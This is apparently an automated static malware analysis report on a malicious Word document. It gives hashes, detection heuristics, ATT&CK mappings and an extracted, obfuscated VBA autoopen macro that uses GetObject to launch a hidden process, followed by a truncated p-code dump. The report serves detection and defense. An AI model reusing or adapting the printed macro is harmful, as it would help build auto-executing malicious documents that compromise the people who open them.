Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c026fa10b57b6ea2…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 144.2 KB
Created: 2019-03-19 16:45:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10

MD5: 4bfbfb1257e3f3cb11de9a7ef7c8b63c
SHA-1: c2eeff0428f98e4eab4d0c420bb6cde66d84aca5
SHA-256: c026fa10b57b6ea2ebd6d6efc4a04df4b1edf8b13ce1c660b615ad0a70a8a714

Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine, which runs automatically when the document is opened. The macro calls the GetObject function, a technique commonly used to obtain a COM object through which embedded or downloaded payloads are executed. This indicates the document is designed to download and execute a second-stage malicious payload.

Heuristics (7)

  • ClamAV: Doc.Malware.Drvb-6901569-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Drvb-6901569-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  10503 bytes
SHA-256: d8148376e3896c75d84a44c7eacb42c8d68f422accf53ae1ecb2cb7aa75d92ba

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iAAAUxAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MDQAG_"
Attribute VB_Base = "0{6A2F53B5-9796-4987-AFA1-C9468714A29A}{93C114CF-DDC9-4BDF-9D5C-225EE3E532C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ww_Ax_UU"
Sub autoopen()
On Error Resume Next
   If TZQGXAQ = YAUokA_G Then
BkABXBA = 569984726 - ChrB(843076583 * Round(935502368) + iAAkDU - ChrB(D_BQUUAw)) / BAXXA1 / Rnd(469117493 / E14CA_A * SpBb / ChrW(50061209 * CBool(40066218) / 607781978 + CStr(oBA_Q1kk))) / 463721617 * Oct(TAAAxUwc)
End If
   If PXcDDAAA = BBcAAB Then
joZZBA = 154354401 - ChrB(471567218 * Round(31201927) + HQC_GDo - ChrB(JQ4oGQQ)) / TUDwUx / Rnd(486658445 / RAC4wBkx * SpBb / ChrW(626150991 * CBool(62483571) / 112118660 + CStr(Oo1AAAAB))) / 321450386 * Oct(SAAAAACc)
End If
Set VkCAoD = GetObject(MDQAG_.iXXQQZGA)
   If cAcADQ = zUwUAXA Then
wA4wAUBA = 453134110 - ChrB(140329015 * Round(871179875) + kDXQXAU - ChrB(iAAoBQAA)) / HD_AAA / Rnd(410789545 / UAUwDBc * SpBb / ChrW(129918205 * CBool(186648157) / 638284754 + CStr(QXAAACAB))) / 773641774 * Oct(S4D1A_A)
End If
   If jZAUAw = CDcBZ4D_ Then
oZAwQQ = 856467553 - ChrB(496823596 * Round(490173833) + sAA1QBCx - ChrB(dGDoAkcc)) / p4GDkAAA / Rnd(792389568 / mAUX1XA * SpBb / ChrW(988484813 * CBool(39158236) / 120920582 + CStr(VwB_ABU))) / 870481188 * Oct(dAAAUXX)
End If
VkCAoD.ShowWindow = 64970 - 64970
   If Xc_GAc = po1A4A Then
AXAUAA = 251164414 - ChrB(651805126 * Round(712340283) + wZAxxAD - ChrB(MoABAU4A)) / FBABAG / Rnd(255677085 / hAACQU * SpBb / ChrW(856406598 * CBool(528235425) / 51027830 + CStr(oQxZAk))) / 938647101 * Oct(SXX__U)
End If
   If DAAAQZ_ = ACA1A_ Then
YACB4B = 629097278 - ChrB(712483311 * Round(804737756) + HAB4DAA - ChrB(jBAc_A4)) / qoAUA4A / Rnd(905399602 / DAAcAAQ * SpBb / ChrW(767340703 * CBool(187238390) / 336030284 + CStr(uUB_AACD))) / 302304842 * Oct(DcDAAXwC)
End If
   If r4UAC_AZ = hDQXDAAU Then
JoZQAwG = 169749046 - ChrB(837101191 * Round(180256317) + sACAD4Q - ChrB(kU4AABD)) / PAxAAck / Rnd(911574048 / poGAAAQD * SpBb / ChrW(226780371 * CBool(552201874) / 66690612 + CStr(cA_AoAo))) / 382562619 * Oct(Zo_DAA)
End If
GetObject(MDQAG_.w4ZAQG_).Create% sAQUcQAA + MDQAG_.rAAwU1 + IQXBXA_B + MDQAG_.HACUDUC + aQAcoA + MDQAG_.IAAAGQAX + S_kUG4X, DQADAXw, VkCAoD, JAxQxA
   If zAQxADBU = VQXZwAZ Then
AAACADU = 566589316 - ChrB(426537712 * Round(756681998) + MA41X41A - ChrB(z1oDAUAB)) / zQAAAX / Rnd(789471137 / pkCkUX * SpBb / ChrW(342247120 * CBool(592197169) / 220856248 + CStr(KDxAQ4D))) / 383850561 * Oct(NBBkBUUQ)
End If
   If vBADoA = EAxAQAA Then
kAQDX1oo = 537583213 - ChrB(350008565 * Round(978413243) + lAQQA4 - ChrB(sc4UG1UU)) / ID4U_cQA / Rnd(259650783 / RAUxAQ * SpBb / ChrW(183434635 * CBool(712580351) / 5986436 + CStr(aoBXXcQx))) / 178995178 * Oct(UAAQADBc)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/2e5515e275f94cec8555a3dcca73d2ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iAAAUxAU - 1106 bytes
' Macros/VBA/MDQAG_ - 1157 bytes
' Macros/VBA/ww_Ax_UU - 4742 bytes
' Line #0:
' 	FuncDefn (Sub ww_Ax_UU())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld TZQGXAQ 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0x46D6 0x21F9 
' 	LitDI4 0x53E7 0x3240 
' 	LitDI4 0xA220 0x37C2 
' 	ArgsLd Round 0x0001 
' 	Mul 
' 	Ld BkABXBA 
' 	Add 
' 	Ld iAAkDU 
' 	ArgsLd ChrB 0x0001 
' 	Sub 
' 	ArgsLd ChrB 0x0001 
' 	Ld D_BQUUAw 
' 	Div 
' 	LitDI4 0x2A35 0x1BF6 
' 	Ld BAXXA1 
' 	Div 
' 	Ld SpBb 
' 	Mul 
' 	LitDI4 0xDF99 0x02FB 
' 	LitDI4 0x5CAA 0x0263 
' 	Coerce (Bool) 
' 	Mul 
' 	LitDI4 0x045A 0x243A 
' 	Div 
' 	Ld E14CA_A 
'
... (truncated)